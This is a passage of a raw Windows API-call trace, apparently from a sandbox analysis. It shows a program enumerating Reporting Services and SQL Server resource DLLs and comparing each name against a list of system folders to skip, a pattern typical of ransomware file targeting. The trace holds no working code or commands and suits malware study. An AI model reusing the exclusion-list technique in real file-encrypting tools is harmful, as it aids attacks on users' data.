lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0126.264] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0126.264] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0126.264] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0126.264] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0126.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d920, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d698, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23ddc8 [0126.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0126.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.265] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4266542, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4266542, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42b29f3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19ae8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0126.265] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0126.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dde8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d578, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244978 [0126.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0126.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.266] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b87f8e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b87f8e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bae279, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71070, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.266] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0126.266] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0126.266] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0126.266] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0126.266] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0126.266] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0126.266] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0126.266] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.266] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0126.266] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0126.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d578, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ecb8 [0126.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244978 | out: hHeap=0x1e0000) returned 1 [0126.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.266] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0063153, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0089415, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14ac8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0126.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0126.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d728, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0126.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0126.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20dde8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0126.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0126.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.267] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x86f312a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86f312a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8719376, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.267] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0126.268] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0126.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.268] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9a04f26, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9a04f26, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9a04f26, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3e78, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.268] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0126.268] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0126.268] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0126.268] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0126.268] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0126.268] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0126.268] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0126.268] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.268] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0126.268] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0126.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d578, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.268] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfcc3c8ab, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcc3c8ab, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcc62b13, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0126.268] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0126.268] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0126.268] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0126.268] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0126.269] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0126.269] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0126.269] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0126.269] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.269] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0126.269] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0126.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.269] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x897b914, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x897b914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x97c9c99, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.269] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0126.269] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0126.269] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0126.269] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0126.269] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0126.269] lstrcmpiW 